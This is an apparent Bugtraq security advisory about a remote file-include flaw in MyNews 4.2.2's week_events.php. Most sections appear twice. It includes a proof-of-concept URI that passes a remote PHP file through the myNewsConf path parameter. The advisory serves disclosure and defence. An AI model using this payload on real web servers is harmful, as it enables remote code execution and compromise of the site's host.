MyNews Week_Events.PHP Remote File Include Vulnerability
BID:23398
Info
MyNews Week_Events.PHP Remote File Include Vulnerability
| Bugtraq ID: | 23398 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 10 2007 12:00AM |
| Updated: | Apr 10 2007 12:00AM |
| Credit: | hackberry is credited with the discovery of this vulnerability. |
| Vulnerable: |
T-Systems Solutions for Research GmbH MyNews 4.2.2 |
| Not Vulnerable: | |
Discussion
MyNews Week_Events.PHP Remote File Include Vulnerability
MyNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
This issue affects MyNews 4.2.2 and prior versions.
MyNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
This issue affects MyNews 4.2.2 and prior versions.
Exploit / POC
MyNews Week_Events.PHP Remote File Include Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/include/blocks/week_events.php?myNewsConf[path][sys][index]=[REMOTEFILE]?
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/include/blocks/week_events.php?myNewsConf[path][sys][index]=[REMOTEFILE]?
Solution / Fix
MyNews Week_Events.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
MyNews Week_Events.PHP Remote File Include Vulnerability
References:
References:
- MyNews Homepage ( T-Systems SfR)